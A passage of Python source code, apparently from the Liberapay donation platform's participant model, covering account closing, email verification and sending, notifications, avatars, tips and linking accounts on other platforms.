self.NoOneToGiveFinalGiftTo\n\n diff = self.balance - distributed\n if diff != 0:\n transfers[0][1] += diff # Give it to the highest receiver.\n\n from liberapay.billing.exchanges import transfer\n db = self.db\n tipper = self.id\n for tippee, amount in transfers:\n balance = transfer(db, tipper, tippee, amount, 'final-gift',\n tipper_mango_id=self.mangopay_user_id,\n tipper_wallet_id=self.mangopay_wallet_id)\n\n assert balance == 0\n self.set_attributes(balance=balance)\n\n def clear_tips_giving(self, cursor):\n \"\"\"Zero out tips from a given user.\n \"\"\"\n tippees = cursor.all(\"\"\"\n\n SELECT ( SELECT p.*::participants\n FROM participants p\n WHERE p.id=t.tippee\n ) AS tippee\n FROM current_tips t\n WHERE tipper = %s\n AND amount > 0\n\n \"\"\", (self.id,))\n for tippee in tippees:\n self.set_tip_to(tippee, '0.00', update_self=False, cursor=cursor)\n\n def clear_tips_receiving(self, cursor):\n \"\"\"Zero out tips to a given user.\n \"\"\"\n tippers = cursor.all(\"\"\"\n\n SELECT ( SELECT p.*::participants\n FROM participants p\n WHERE p.id=t.tipper\n ) AS tipper\n FROM current_tips t\n WHERE tippee = %s\n AND amount > 0\n\n \"\"\", (self.id,))\n for tipper in tippers:\n tipper.set_tip_to(self, '0.00', update_tippee=False, cursor=cursor)\n\n def clear_takes(self, cursor):\n \"\"\"Leave all teams by zeroing all takes.\n \"\"\"\n teams = cursor.all(\"\"\"\n SELECT p.*::participants\n FROM current_takes x\n JOIN participants p ON p.id = x.team\n WHERE member=%s\n \"\"\", (self.id,))\n for t in teams:\n t.set_take_for(self, None, self, cursor)\n\n def clear_personal_information(self, cursor):\n \"\"\"Clear personal information such as statements and goal.\n \"\"\"\n r = cursor.one(\"\"\"\n\n DELETE FROM community_memberships WHERE participant=%(id)s;\n DELETE FROM community_subscriptions WHERE participant=%(id)s;\n DELETE FROM emails WHERE participant=%(id)s AND address <> %(email)s;\n DELETE FROM statements WHERE participant=%(id)s;\n\n UPDATE participants\n SET goal=NULL\n , avatar_url=NULL\n , session_token=NULL\n , session_expires=now()\n , giving=0\n , receiving=0\n , npatrons=0\n WHERE id=%(id)s\n RETURNING *;\n\n \"\"\", dict(id=self.id, email=self.email))\n self.set_attributes(**r._asdict())\n\n @property\n def closed_time(self):\n return self.db.one(\"\"\"\n SELECT ts\n FROM events\n WHERE participant=%s\n AND type='set_status'\n AND payload='\"closed\"'\n ORDER BY ts DESC\n LIMIT 1\n \"\"\", (str(self.id),))\n\n\n # Emails\n # ======\n\n def add_email(self, email, cursor=None):\n \"\"\"\n This is called when\n 1) Adding a new email address\n 2) Resending the verification email for an unverified email address\n\n Returns the number of emails sent.\n \"\"\"\n\n if not EMAIL_RE.match(email):\n raise BadEmailAddress(email)\n\n # Check that this address isn't already verified\n owner = (cursor or self.db).one(\"\"\"\n SELECT participant\n FROM emails\n WHERE address = %(email)s\n AND verified IS true\n \"\"\", locals())\n if owner:\n if owner == self.id:\n return 0\n else:\n raise EmailAlreadyTaken(email)\n\n if len(self.get_emails()) > 9:\n raise TooManyEmailAddresses(email)\n\n nonce = str(uuid.uuid4())\n added_time = utcnow()\n try:\n with self.db.get_cursor(cursor) as c:\n self.add_event(c, 'add_email', email)\n c.run(\"\"\"\n INSERT INTO emails\n (address, nonce, added_time, participant)\n VALUES (%s, %s, %s, %s)\n \"\"\", (email, nonce, added_time, self.id))\n except IntegrityError:\n nonce = (cursor or self.db).one(\"\"\"\n UPDATE emails\n SET added_time=%s\n WHERE participant=%s\n AND address=%s\n AND verified IS NULL\n RETURNING nonce\n \"\"\", (added_time, self.id, email))\n if not nonce:\n return self.add_email(email)\n\n scheme = website.canonical_scheme\n host = website.canonical_host\n username = self.username\n base64_email = b64encode_s(email)\n link = \"{scheme}://{host}/{username}/emails/verify.html?email64={base64_email}&nonce={nonce}\"\n r = self.send_email('verification', email=email, link=link.format(**locals()))\n assert r == 1 # Make sure the verification email was sent\n\n if self.email:\n self.send_email('verification_notice', new_email=email)\n return 2\n else:\n self.update_avatar(cursor=cursor)\n\n return 1\n\n def update_email(self, email):\n if not getattr(self.get_email(email), 'verified', False):\n raise EmailNotVerified(email)\n id = self.id\n with self.db.get_cursor() as c:\n self.add_event(c, 'set_primary_email', email)\n c.run(\"\"\"\n UPDATE participants\n SET email=%(email)s\n WHERE id=%(id)s\n \"\"\", locals())\n self.set_attributes(email=email)\n self.update_avatar()\n\n def verify_email(self, email, nonce):\n if '' in (email, nonce):\n return emails.VERIFICATION_MISSING\n r = self.get_email(email)\n if r is None:\n return emails.VERIFICATION_FAILED\n if r.verified:\n assert r.nonce is None # and therefore, order of conditions matters\n return emails.VERIFICATION_REDUNDANT\n if not constant_time_compare(r.nonce, nonce):\n return emails.VERIFICATION_FAILED\n if (utcnow() - r.added_time) > EMAIL_VERIFICATION_TIMEOUT:\n return emails.VERIFICATION_EXPIRED\n try:\n self.db.run(\"\"\"\n UPDATE emails\n SET verified=true, verified_time=now(), nonce=NULL\n WHERE participant=%s\n AND address=%s\n AND verified IS NULL\n \"\"\", (self.id, email))\n except IntegrityError:\n return emails.VERIFICATION_STYMIED\n\n if not self.email:\n self.update_email(email)\n return emails.VERIFICATION_SUCCEEDED\n\n def get_email(self, email):\n return self.db.one(\"\"\"\n SELECT *\n FROM emails\n WHERE participant=%s\n AND address=%s\n \"\"\", (self.id, email))\n\n def get_emails(self):\n return self.db.all(\"\"\"\n SELECT *\n FROM emails\n WHERE participant=%s\n ORDER BY id\n \"\"\", (self.id,))\n\n def get_any_email(self, cursor=None):\n return (cursor or self.db).one(\"\"\"\n SELECT address\n FROM emails\n WHERE participant=%s\n LIMIT 1\n \"\"\", (self.id,))\n\n def remove_email(self, address):\n if address == self.email:\n raise CannotRemovePrimaryEmail()\n with self.db.get_cursor() as c:\n self.add_event(c, 'remove_email', address)\n c.run(\"DELETE FROM emails WHERE participant=%s AND address=%s\",\n (self.id, address))\n\n def send_email(self, spt_name, **context):\n self.fill_notification_context(context)\n email = context.setdefault('email', self.email)\n if not email:\n return 0 # Not Sent\n langs = i18n.parse_accept_lang(self.email_lang or 'en')\n locale = i18n.match_lang(langs)\n i18n.add_helpers_to_context(context, locale)\n context['escape'] = lambda s: s\n context_html = dict(context)\n i18n.add_helpers_to_context(context_html, locale)\n context_html['escape'] = htmlescape\n spt = website.emails[spt_name]\n base_spt = website.emails['base']\n def render(t, context):\n b = base_spt[t].render(context).strip()\n return b.replace('$body', spt[t].render(context).strip())\n message = {}\n message['from_email'] = 'Liberapay Support '\n message['to'] = [formataddr((self.username, email))]\n message['subject'] = spt['subject'].render(context).strip()\n message['html'] = render('text/html', context_html)\n message['text'] = render('text/plain', context)\n\n n = website.mailer.send(**message)\n website.log_email(message)\n return n\n\n def queue_email(self, spt_name, **context):\n context = serialize(context)\n self.db.run(\"\"\"\n INSERT INTO email_queue\n (participant, spt_name, context)\n VALUES (%s, %s, %s)\n \"\"\", (self.id, spt_name, context))\n\n @classmethod\n def dequeue_emails(cls):\n fetch_messages = lambda: cls.db.all(\"\"\"\n SELECT *\n FROM email_queue\n ORDER BY id ASC\n LIMIT 60\n \"\"\")\n delete = lambda m: cls.db.run(\n \"DELETE FROM email_queue WHERE id = %s\", (m.id,)\n )\n while True:\n messages = fetch_messages()\n if not messages:\n break\n for msg in messages:\n p = cls.from_id(msg.participant)\n if not p.email:\n delete(msg)\n continue\n try:\n r = p.send_email(msg.spt_name, **pickle.loads(msg.context))\n assert r == 1\n except Exception as e:\n website.tell_sentry(e, {}, allow_reraise=True)\n else:\n delete(msg)\n sleep(1)\n\n def set_email_lang(self, accept_lang):\n if not accept_lang:\n return\n self.db.run(\"UPDATE participants SET email_lang=%s WHERE id=%s\",\n (accept_lang, self.id))\n self.set_attributes(email_lang=accept_lang)\n\n\n # Notifications\n # =============\n\n def notify(self, event, force_email=False, web=True, **context):\n if force_email or self.email_notif_bits & EVENTS.get(event).bit:\n self.queue_email(event, **context)\n if web:\n return self.add_notification(event, **context)\n\n def add_notification(self, event, **context):\n p_id = self.id\n context = serialize(context)\n n_id = self.db.one(\"\"\"\n INSERT INTO notification_queue\n (participant, event, context)\n VALUES (%(p_id)s, %(event)s, %(context)s)\n RETURNING id;\n \"\"\", locals())\n pending_notifs = self.db.one(\"\"\"\n UPDATE participants\n SET pending_notifs = pending_notifs + 1\n WHERE id = %(p_id)s\n RETURNING pending_notifs;\n \"\"\", locals())\n self.set_attributes(pending_notifs=pending_notifs)\n return n_id\n\n def mark_notification_as_read(self, n_id):\n p_id = self.id\n r = self.db.one(\"\"\"\n WITH updated AS (\n UPDATE notification_queue\n SET is_new = false\n WHERE participant = %(p_id)s\n AND id = %(n_id)s\n AND is_new\n RETURNING id\n )\n UPDATE participants\n SET pending_notifs = pending_notifs - (SELECT count(*) FROM updated)\n WHERE id = %(p_id)s\n RETURNING pending_notifs;\n \"\"\", locals())\n self.set_attributes(pending_notifs=r)\n\n def mark_notifications_as_read(self, event=None):\n if not self.pending_notifs:\n return\n p_id = self.id\n sql_filter = 'AND event = %(event)s' if event else ''\n r = self.db.one(\"\"\"\n WITH updated AS (\n UPDATE notification_queue\n SET is_new = false\n WHERE participant = %(p_id)s\n AND is_new\n {0}\n RETURNING id\n )\n UPDATE participants\n SET pending_notifs = pending_notifs - (SELECT count(*) FROM updated)\n WHERE id = %(p_id)s\n RETURNING pending_notifs;\n \"\"\".format(sql_filter), locals())\n self.set_attributes(pending_notifs=r)\n\n def remove_notification(self, n_id):\n p_id = self.id\n r = self.db.one(\"\"\"\n WITH deleted AS (\n DELETE FROM notification_queue\n WHERE id = %(n_id)s\n AND participant = %(p_id)s\n RETURNING is_new\n )\n UPDATE participants\n SET pending_notifs = pending_notifs - (\n SELECT count(*) FROM deleted WHERE is_new\n )\n WHERE id = %(p_id)s\n RETURNING pending_notifs;\n \"\"\", locals())\n self.set_attributes(pending_notifs=r)\n\n def fill_notification_context(self, context):\n context.update(aspen_jinja2_renderer.Renderer.global_context)\n context['participant'] = self\n context['username'] = self.username\n context['button_style'] = (\n \"color: #fff; text-decoration:none; display:inline-block; \"\n \"padding: 0 15px; background: #396; white-space: nowrap; \"\n \"font: normal 14px/40px Arial, sans-serif; border-radius: 3px\"\n )\n\n def render_notifications(self, state):\n r = []\n notifs = self.db.all(\"\"\"\n SELECT id, event, context, is_new\n FROM notification_queue\n WHERE participant = %s\n ORDER BY is_new DESC, id DESC\n \"\"\", (self.id,))\n for id, event, notif_context, is_new in notifs:\n try:\n notif_context = pickle.loads(notif_context)\n context = dict(state)\n self.fill_notification_context(context)\n context.update(notif_context)\n spt = website.emails[event]\n html = spt['text/html'].render(context).strip()\n typ = notif_context.get('type', 'info')\n r.append(dict(id=id, html=html, type=typ, is_new=is_new))\n except Exception as e:\n website.tell_sentry(e, state, allow_reraise=True)\n return r\n\n def notify_patrons(self, elsewhere, tips):\n for t in tips:\n Participant.from_id(t.tipper).notify(\n 'pledgee_joined',\n user_name=elsewhere.user_name,\n platform=elsewhere.platform_data.display_name,\n amount=t.amount,\n profile_url=elsewhere.liberapay_url,\n )\n\n\n # Exchange-related stuff\n # ======================\n\n def get_bank_account_error(self):\n return getattr(ExchangeRoute.from_network(self, 'mango-ba'), 'error', None)\n\n def get_credit_card_error(self):\n return getattr(ExchangeRoute.from_network(self, 'mango-cc'), 'error', None)\n\n @property\n def withdrawable_balance(self):\n from liberapay.billing.exchanges import QUARANTINE\n return self.db.one(\"\"\"\n SELECT COALESCE(sum(amount), 0)\n FROM cash_bundles\n WHERE owner = %s\n AND ts < now() - INTERVAL %s\n \"\"\", (self.id, QUARANTINE))\n\n\n # Random Stuff\n # ============\n\n def add_event(self, c, type, payload, recorder=None):\n c.run(\"\"\"\n INSERT INTO events (participant, type, payload, recorder)\n VALUES (%s, %s, %s, %s)\n \"\"\", (self.id, type, Json(payload), recorder))\n\n def url(self, path='', query=''):\n scheme = website.canonical_scheme\n host = website.canonical_host\n username = self.username\n if query:\n assert '?' not in path\n query = '?' + urlencode(query)\n return '{scheme}://{host}/{username}/{path}{query}'.format(**locals())\n\n def get_teams(self):\n \"\"\"Return a list of teams this user is a member of.\n \"\"\"\n return self.db.all(\"\"\"\n\n SELECT team AS id\n , p.username AS name\n , ( SELECT count(*)\n FROM current_takes\n WHERE team=x.team\n ) AS nmembers\n FROM current_takes x\n JOIN participants p ON p.id = x.team\n WHERE member=%s;\n\n \"\"\", (self.id,))\n\n @property\n def accepts_tips(self):\n return (self.goal is None) or (self.goal >= 0)\n\n\n # Communities\n # ===========\n\n def create_community(self, name, **kw):\n return Community.create(name, self.id, **kw)\n\n def update_community_status(self, table, on, c_id):\n assert table in ('memberships', 'subscriptions')\n p_id = self.id\n self.db.run(\"\"\"\n DO $$\n DECLARE\n cname text;\n BEGIN\n BEGIN\n INSERT INTO community_{0}\n (community, participant, is_on)\n VALUES (%(c_id)s, %(p_id)s, %(on)s);\n IF (FOUND) THEN RETURN; END IF;\n EXCEPTION WHEN unique_violation THEN\n GET STACKED DIAGNOSTICS cname = CONSTRAINT_NAME;\n IF (cname <> 'community_{0}_participant_community_key') THEN\n RAISE;\n END IF;\n END;\n UPDATE community_{0}\n SET is_on = %(on)s\n , mtime = CURRENT_TIMESTAMP\n WHERE community = %(c_id)s\n AND participant = %(p_id)s;\n IF (NOT FOUND) THEN\n RAISE 'upsert in community_{0} failed';\n END IF;\n END;\n $$ LANGUAGE plpgsql;\n \"\"\".format(table), locals())\n\n\n def get_communities(self):\n return self.db.all(\"\"\"\n SELECT c.*, replace(c.name, '_', ' ') AS pretty_name\n FROM community_memberships cm\n JOIN communities c ON c.id = cm.community\n WHERE cm.is_on AND cm.participant = %s\n ORDER BY c.nmembers ASC, c.name\n \"\"\", (self.id,))\n\n\n # More Random Stuff\n # =================\n\n def change_username(self, suggested, cursor=None):\n suggested = suggested and suggested.strip()\n\n if not suggested:\n raise UsernameIsEmpty(suggested)\n\n if len(suggested) > USERNAME_MAX_SIZE:\n raise UsernameTooLong(suggested)\n\n if set(suggested) - ASCII_ALLOWED_IN_USERNAME:\n raise UsernameContainsInvalidCharacters(suggested)\n\n lowercased = suggested.lower()\n\n if lowercased in website.restricted_usernames:\n raise UsernameIsRestricted(suggested)\n\n if suggested != self.username:\n with self.db.get_cursor(cursor) as c:\n try:\n # Will raise IntegrityError if the desired username is taken.\n actual = c.one(\"\"\"\n UPDATE participants\n SET username=%s\n WHERE id=%s\n RETURNING username, lower(username)\n \"\"\", (suggested, self.id))\n except IntegrityError:\n raise UsernameAlreadyTaken(suggested)\n\n self.add_event(c, 'set_username', suggested)\n assert (suggested, lowercased) == actual # sanity check\n self.set_attributes(username=suggested)\n\n return suggested\n\n def update_avatar(self, src=None, cursor=None):\n if self.status == 'stub':\n assert src is None\n\n platform, key = src.split(':', 1) if src else (None, None)\n email = self.avatar_email or self.email or self.get_any_email(cursor)\n\n if platform == 'libravatar' or platform is None and email:\n if not email:\n return\n avatar_id = md5(email.strip().lower()).hexdigest()\n avatar_url = 'https://seccdn.libravatar.org/avatar/'+avatar_id\n avatar_url += AVATAR_QUERY\n\n elif platform is None:\n avatar_url = (cursor or self.db).one(\"\"\"\n SELECT avatar_url\n FROM elsewhere\n WHERE participant = %s\n ORDER BY platform = 'github' DESC,\n avatar_url LIKE '%%libravatar.org%%' DESC,\n avatar_url LIKE '%%gravatar.com%%' DESC\n LIMIT 1\n \"\"\", (self.id,))\n\n else:\n avatar_url = (cursor or self.db).one(\"\"\"\n SELECT avatar_url\n FROM elsewhere\n WHERE participant = %s\n AND platform = %s\n -- AND user_id = %%s -- not implemented yet\n \"\"\", (self.id, platform))\n\n if not avatar_url:\n return\n\n (cursor or self.db).run(\"\"\"\n UPDATE participants\n SET avatar_url = %s\n , avatar_src = %s\n WHERE id = %s\n \"\"\", (avatar_url, src, self.id))\n self.set_attributes(avatar_src=src, avatar_url=avatar_url)\n\n return avatar_url\n\n def update_goal(self, goal, cursor=None):\n with self.db.get_cursor(cursor) as c:\n json = None if goal is None else str(goal)\n self.add_event(c, 'set_goal', json)\n c.run(\"UPDATE participants SET goal=%s WHERE id=%s\", (goal, self.id))\n self.set_attributes(goal=goal)\n if not self.accepts_tips:\n self.clear_tips_receiving(c)\n self.update_receiving(c)\n\n def update_status(self, status, cursor=None):\n with self.db.get_cursor(cursor) as c:\n goal = 'goal'\n if status == 'closed':\n goal = '-1'\n elif status == 'active':\n goal = 'NULL'\n r = c.one(\"\"\"\n UPDATE participants\n SET status = %(status)s\n , join_time = COALESCE(join_time, CURRENT_TIMESTAMP)\n , goal = {0}\n WHERE id=%(id)s\n RETURNING status, join_time, goal\n \"\"\".format(goal), dict(id=self.id, status=status))\n self.set_attributes(**r._asdict())\n self.add_event(c, 'set_status', status)\n if not self.accepts_tips:\n self.clear_tips_receiving(c)\n self.update_receiving(c)\n\n def update_giving_and_tippees(self, cursor):\n updated_tips = self.update_giving(cursor)\n for tip in updated_tips:\n Participant.from_id(tip.tippee).update_receiving(cursor)\n\n def update_giving(self, cursor=None):\n # Update is_funded on tips\n tips = (cursor or self.db).all(\"\"\"\n SELECT t.*\n FROM current_tips t\n JOIN participants p2 ON p2.id = t.tippee\n WHERE t.tipper = %s\n AND t.amount > 0\n ORDER BY p2.join_time IS NULL, t.ctime ASC\n \"\"\", (self.id,))\n fake_balance = self.balance + self.receiving\n updated = []\n for tip in tips:\n if tip.amount > fake_balance:\n is_funded = False\n else:\n fake_balance -= tip.amount\n is_funded = True\n if tip.is_funded == is_funded:\n continue\n updated.append((cursor or self.db).one(\"\"\"\n UPDATE tips\n SET is_funded = %s\n WHERE id = %s\n RETURNING *\n \"\"\", (is_funded, tip.id)))\n\n # Update giving on participant\n giving = (cursor or self.db).one(\"\"\"\n UPDATE participants p\n SET giving = COALESCE((\n SELECT sum(amount)\n FROM current_tips\n JOIN participants p2 ON p2.id = tippee\n WHERE tipper = %(id)s\n AND p2.status = 'active'\n AND (p2.mangopay_user_id IS NOT NULL OR kind = 'group')\n AND amount > 0\n AND is_funded\n ), 0)\n WHERE p.id = %(id)s\n RETURNING giving\n \"\"\", dict(id=self.id))\n self.set_attributes(giving=giving)\n\n return updated\n\n def update_receiving(self, cursor=None):\n if self.kind == 'group':\n old_takes = self.compute_actual_takes(cursor=cursor)\n r = (cursor or self.db).one(\"\"\"\n WITH our_tips AS (\n SELECT amount\n FROM current_tips\n WHERE tippee = %(id)s\n AND amount > 0\n AND is_funded\n )\n UPDATE participants p\n SET receiving = (COALESCE((\n SELECT sum(amount)\n FROM our_tips\n ), 0) + taking)\n , npatrons = COALESCE((SELECT count(*) FROM our_tips), 0)\n WHERE p.id = %(id)s\n RETURNING receiving, npatrons\n \"\"\", dict(id=self.id))\n self.set_attributes(receiving=r.receiving, npatrons=r.npatrons)\n if self.kind == 'group':\n new_takes = self.compute_actual_takes(cursor=cursor)\n self.update_taking(old_takes, new_takes, cursor=cursor)\n\n\n def set_tip_to(self, tippee, amount, update_self=True, update_tippee=True, cursor=None):\n \"\"\"Given a Participant or username, and amount as str, returns a dict.\n\n We INSERT instead of UPDATE, so that we have history to explore. The\n COALESCE function returns the first of its arguments that is not NULL.\n The effect here is to stamp all tips with the timestamp of the first\n tip from this user to that. I believe this is used to determine the\n order of transfers during payday.\n\n The dict returned represents the row inserted in the tips table, with\n an additional boolean indicating whether this is the first time this\n tipper has tipped (we want to track that as part of our conversion\n funnel).\n\n \"\"\"\n assert self.status == 'active' # sanity check\n\n if isinstance(tippee, AccountElsewhere):\n tippee = tippee.participant\n elif not isinstance(tippee, Participant):\n tippee, u = Participant.from_username(tippee), tippee\n if not tippee:\n raise NoTippee(u)\n\n if self.id == tippee.id:\n raise NoSelfTipping\n\n amount = Decimal(amount) # May raise InvalidOperation\n if amount != 0 and amount < MIN_TIP or amount > MAX_TIP:\n raise BadAmount(amount)\n\n if not tippee.accepts_tips and amount != 0:\n raise UserDoesntAcceptTips(tippee.username)\n\n # Insert tip\n NEW_TIP = \"\"\"\\\n\n INSERT INTO tips\n (ctime, tipper, tippee, amount)\n VALUES ( COALESCE (( SELECT ctime\n FROM tips\n WHERE (tipper=%(tipper)s AND tippee=%(tippee)s)\n LIMIT 1\n ), CURRENT_TIMESTAMP)\n , %(tipper)s, %(tippee)s, %(amount)s\n )\n RETURNING *\n , ( SELECT count(*) = 0 FROM tips WHERE tipper=%(tipper)s ) AS first_time_tipper\n , ( SELECT join_time IS NULL FROM participants WHERE id = %(tippee)s ) AS is_pledge\n\n \"\"\"\n args = dict(tipper=self.id, tippee=tippee.id, amount=amount)\n t = (cursor or self.db).one(NEW_TIP, args)._asdict()\n\n if update_self:\n # Update giving amount of tipper\n updated = self.update_giving(cursor)\n for u in updated:\n if u.id == t['id']:\n t['is_funded'] = u.is_funded\n if update_tippee:\n # Update receiving amount of tippee\n tippee.update_receiving(cursor)\n\n return t\n\n\n @staticmethod\n def _zero_tip_dict(tippee):\n if isinstance(tippee, Participant):\n tippee = tippee.id\n return dict(amount=Decimal('0.00'), is_funded=False, tippee=tippee)\n\n\n def get_tip_to(self, tippee):\n \"\"\"Given a participant (or their id), returns a dict.\n \"\"\"\n default = self._zero_tip_dict(tippee)\n tippee = default['tippee']\n if self.id == tippee:\n return default\n return self.db.one(\"\"\"\\\n\n SELECT *\n FROM tips\n WHERE tipper=%s\n AND tippee=%s\n ORDER BY mtime DESC\n LIMIT 1\n\n \"\"\", (self.id, tippee), back_as=dict, default=default)\n\n\n def get_tip_distribution(self):\n \"\"\"\n Returns a data structure in the form of::\n\n [\n [TIPAMOUNT1, TIPAMOUNT2...TIPAMOUNTN],\n total_number_patrons_giving_to_me,\n total_amount_received\n ]\n\n where each TIPAMOUNTN is in the form::\n\n [\n amount,\n number_of_tippers_for_this_amount,\n total_amount_given_at_this_amount,\n proportion_of_tips_at_this_amount,\n proportion_of_total_amount_at_this_amount\n ]\n\n \"\"\"\n SQL = \"\"\"\n\n SELECT amount\n , count(amount) AS ncontributing\n FROM ( SELECT DISTINCT ON (tipper)\n amount\n , tipper\n FROM tips\n WHERE tippee=%s\n AND is_funded\n ORDER BY tipper\n , mtime DESC\n ) AS foo\n WHERE amount > 0\n GROUP BY amount\n ORDER BY amount\n\n \"\"\"\n\n tip_amounts = []\n\n npatrons = 0.0 # float to trigger float division\n contributed = Decimal('0.00')\n for rec in self.db.all(SQL, (self.id,)):\n tip_amounts.append([ rec.amount\n , rec.ncontributing\n , rec.amount * rec.ncontributing\n ])\n contributed += tip_amounts[-1][2]\n npatrons += rec.ncontributing\n\n for row in tip_amounts:\n row.append((row[1] / npatrons) if npatrons > 0 else 0)\n row.append((row[2] / contributed) if contributed > 0 else 0)\n\n return tip_amounts, npatrons, contributed\n\n\n def get_giving_for_profile(self):\n\n tips = self.db.all(\"\"\"\\\n\n SELECT * FROM (\n SELECT DISTINCT ON (tippee)\n amount\n , tippee\n , t.ctime\n , t.mtime\n , p.join_time\n , p.username\n , p.kind\n , t.is_funded\n , (p.mangopay_user_id IS NOT NULL OR kind = 'group') AS is_identified\n FROM tips t\n JOIN participants p ON p.id = t.tippee\n WHERE tipper = %s\n AND p.status = 'active'\n ORDER BY tippee\n , t.mtime DESC\n ) AS foo\n ORDER BY amount DESC\n , username\n\n \"\"\", (self.id,))\n\n pledges = self.db.all(\"\"\"\\\n\n SELECT * FROM (\n SELECT DISTINCT ON (tippee)\n amount\n , tippee\n , t.ctime\n , t.mtime\n , p.join_time\n , p.username\n , e.platform\n , e.user_name\n FROM tips t\n JOIN participants p ON p.id = t.tippee\n JOIN elsewhere e ON e.participant = t.tippee\n WHERE tipper = %s\n AND p.status = 'stub'\n ORDER BY tippee\n , t.mtime DESC\n ) AS foo\n ORDER BY amount DESC\n , lower(user_name)\n\n \"\"\", (self.id,))\n\n\n # Compute the total\n\n total = sum([t.amount for t in tips])\n if not total:\n # If tips is an empty list, total is int 0. We want a Decimal.\n total = Decimal('0.00')\n\n pledges_total = sum([t.amount for t in pledges])\n if not pledges_total:\n pledges_total = Decimal('0.00')\n\n return tips, total, pledges, pledges_total\n\n def get_tips_receiving(self):\n return self.db.all(\"\"\"\n SELECT *\n FROM current_tips\n WHERE tippee=%s\n AND amount>0\n \"\"\", (self.id,))\n\n def get_current_tips(self):\n \"\"\"Get the tips this participant is currently sending to others.\n \"\"\"\n return self.db.all(\"\"\"\n SELECT * FROM (\n SELECT DISTINCT ON (tippee)\n amount\n , tippee\n , t.ctime\n , p.username\n , p.join_time\n FROM tips t\n JOIN participants p ON p.id = t.tippee\n WHERE tipper = %s\n ORDER BY tippee\n , t.mtime DESC\n ) AS foo\n ORDER BY amount DESC\n , tippee\n \"\"\", (self.id,), back_as=dict)\n\n\n def get_age_in_seconds(self):\n if self.join_time is not None:\n return (utcnow() - self.join_time).total_seconds()\n return -1\n\n\n def get_account_elsewhere(self, platform):\n \"\"\"Return an AccountElsewhere instance.\n \"\"\"\n return self.db.one(\"\"\"\n\n SELECT elsewhere.*::elsewhere_with_participant\n FROM elsewhere\n WHERE participant=%s\n AND platform=%s\n\n \"\"\", (self.id, platform))\n\n\n def get_accounts_elsewhere(self):\n \"\"\"Return a dict of AccountElsewhere instances.\n \"\"\"\n accounts = self.db.all(\"\"\"\n\n SELECT elsewhere.*::elsewhere_with_participant\n FROM elsewhere\n WHERE participant=%s\n\n \"\"\", (self.id,))\n accounts_dict = {account.platform: account for account in accounts}\n return accounts_dict\n\n\n def get_mangopay_account(self):\n \"\"\"Fetch the mangopay account for this participant.\n \"\"\"\n if not self.mangopay_user_id:\n return\n return mangoapi.users.Get(self.mangopay_user_id)\n\n\n def take_over(self, account, have_confirmation=False):\n \"\"\"Given an AccountElsewhere or a tuple (platform_name, user_id),\n associate an elsewhere account.\n\n Returns None or raises NeedConfirmation.\n\n This method associates an account on another platform (GitHub, Twitter,\n etc.) with the given Liberapay participant. Every account elsewhere has an\n associated Liberapay participant account, even if its only a stub\n participant (it allows us to track pledges to that account should they\n ever decide to join Liberapay).\n\n In certain circumstances, we want to present the user with a\n confirmation before proceeding to transfer the account elsewhere to\n the new Liberapay account; NeedConfirmation is the signal to request\n confirmation.\n \"\"\"\n\n if isinstance(account, AccountElsewhere):\n platform, user_id = account.platform, account.user_id\n else:\n platform, user_id = map(str, account)\n\n CREATE_TEMP_TABLE_FOR_TIPS = \"\"\"\n CREATE TEMP TABLE temp_tips ON COMMIT drop AS\n SELECT ctime, tipper, tippee, amount, is_funded\n FROM current_tips\n WHERE (tippee = %(dead)s OR tippee = %(live)s)\n AND amount > 0;\n \"\"\"\n\n CONSOLIDATE_TIPS_RECEIVING = \"\"\"\n -- Create a new set of tips, one for each current tip *to* either\n -- the dead or the live account. If a user was tipping both the\n -- dead and the live account, then we create one new combined tip\n -- to the live account (via the GROUP BY and sum()).\n INSERT INTO tips (ctime, tipper, tippee, amount, is_funded)\n SELECT min(ctime), tipper, %(live)s AS tippee, sum(amount), bool_and(is_funded)\n FROM temp_tips\n WHERE (tippee = %(dead)s OR tippee = %(live)s)\n -- Include tips *to* either the dead or live account.\n AND NOT (tipper = %(dead)s OR tipper = %(live)s)\n -- Don't include tips *from* the dead or live account,\n -- lest we convert cross-tipping to self-tipping.\n GROUP BY tipper\n \"\"\"\n\n ZERO_OUT_OLD_TIPS_RECEIVING = \"\"\"\n INSERT INTO tips (ctime, tipper, tippee, amount)\n SELECT ctime, tipper, tippee, 0 AS amount\n FROM temp_tips\n WHERE tippee=%s\n \"\"\"\n\n with self.db.get_cursor() as cursor:\n\n # Load the existing connection\n # Every account elsewhere has at least a stub participant account\n # on Liberapay.\n elsewhere = cursor.one(\"\"\"\n SELECT e.*::elsewhere_with_participant\n FROM elsewhere e\n JOIN participants p ON p.id = e.participant\n WHERE e.platform=%s AND e.user_id=%s\n \"\"\", (platform, user_id), default=Exception)\n other = elsewhere.participant\n\n if self.id == other.id:\n # this is a no op - trying to take over itself\n return\n\n # Save old tips so we can notify patrons that they've been claimed\n old_tips = other.get_tips_receiving() if other.status == 'stub' else None\n\n # Make sure we have user confirmation if needed.\n # ==============================================\n # We need confirmation if any of these are true:\n #\n # - the other participant is not a stub; we are taking the\n # account elsewhere away from another viable participant\n #\n # - we already have an account elsewhere connected from the given\n # platform, and it will be handed off to a new stub\n # participant\n\n other_is_a_real_participant = other.status != 'stub'\n\n we_already_have_that_kind_of_account = cursor.one(\"\"\"\n SELECT true\n FROM elsewhere\n WHERE participant=%s AND platform=%s\n \"\"\", (self.id, platform), default=False)\n\n need_confirmation = NeedConfirmation(\n other_is_a_real_participant,\n we_already_have_that_kind_of_account,\n )\n if need_confirmation and not have_confirmation:\n raise need_confirmation\n\n # Move any old account out of the way\n if we_already_have_that_kind_of_account:\n new_stub = Participant.make_stub(cursor)\n cursor.run( \"UPDATE elsewhere SET participant=%s \"\n \"WHERE platform=%s AND participant=%s\"\n , (new_stub.id, platform, self.id)\n )\n\n # Do the deal\n cursor.run( \"UPDATE elsewhere SET participant=%s \"\n \"WHERE platform=%s AND user_id=%s\"\n , (self.id, platform, user_id)\n )\n\n # Turn pledges into actual tips\n if old_tips:\n x, y = self.id, other.id\n cursor.run(CREATE_TEMP_TABLE_FOR_TIPS, dict(live=x, dead=y))\n cursor.run(CONSOLIDATE_TIPS_RECEIVING, dict(live=x, dead=y))\n cursor.run(ZERO_OUT_OLD_TIPS_RECEIVING, (other.id,))\n\n # Try to delete the stub account, or prevent new pledges to it\n if not other_is_a_real_participant:\n cursor.run(\"\"\"\n DO $$\n BEGIN\n DELETE FROM participants WHERE id = %(dead)s;\n EXCEPTION WHEN OTHERS THEN\n UPDATE participants\n SET goal = -1\n WHERE id = %(dead)s;\n END;\n $$ LANGUAGE plpgsql;\n \"\"\", dict(dead=other.id))\n\n # Log the event\n payload = 